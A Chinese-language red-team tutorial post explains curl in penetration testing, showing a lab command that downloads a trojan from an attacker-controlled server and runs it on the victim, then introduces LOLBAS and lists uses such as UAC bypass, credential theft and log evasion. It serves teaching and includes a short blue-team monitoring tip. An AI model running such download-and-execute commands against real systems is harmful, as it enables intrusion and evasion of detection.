紅隊技巧:Curl在滲透測試中的應用

Curl在滲透測試中的應用


Curl介紹

curl是一個利用URL語法在命令行下工作的文件傳輸工具,1997年首次發行。它支持文件上傳和下載,所以是綜合傳輸工具。

curl可以用於處理遠程服務器上的文件。

例如,我們可以在目標機器上利用curl下載遠程服務器的木馬文件並執行。或者我們可以利用curl將受害機器上的文件傳輸到遠程服務器上。

Test

1、python -m SimpleHTTPServer 8080在kali上開啟web服務

2、生成木馬並開啟msf監聽

3、打開cmd

利用命令curl -O http://192.168.234.151:8080/test.exe & start test.exe

將木馬文件下載到受害機器並運行。

紅隊技巧:Curl在滲透測試中的應用

紅隊技巧:Curl在滲透測試中的應用

這裡看到木馬文件成功下載並上線。

在網絡攻防中,針對curl,藍隊應通過規則加大對curl的監控,如果沒用特別的需求,可對其按照策略進行阻止。

Why?

那這裡為什麼要說到curl呢?其實像curl這種系統自帶的二進制文件有很多,可以執行很多種系統的命令。例如下載、執行、編譯、bypassuac等等,在github上有一個很不錯的項目——LOLBAS。在這個項目中,包含了類似curl的二進制文件以及腳本。

該項目旨在“The goal of the LOLBAS project is to document every binary,>

依靠土地技術生存應該更好的理解為,運用系統自帶的二進制文件進行滲透測試,以達到降低被安全廠商檢測的目的。倘若我們在實際滲透的過程中,使用的都是自己的編寫的”十分強大便捷”的工具,那麼極有可能會被受害者發現。

被選入LOLBAS項目的文件或腳本必須滿足以下三個條件:

  • 是Microsoft簽名的文件,可以是操作系統本身的文件,也可以是從Microsoft下載的文件。
  • 具有額外的”意外”功能。
  • 擁有對APT團隊以及紅隊有用的功能。

可以利用LOLBAS做到如下:

  • 執行代碼
  • 編譯代碼
  • 操作文件
  • 持久利用
  • UAC bypass
  • 憑證盜竊
  • 轉儲過程內存
  • 網絡監視
  • 日誌逃避/修改
  • DLL側載/劫持,而無需在文件系統中的其他位置進行重定位。


分享到:


相關文章: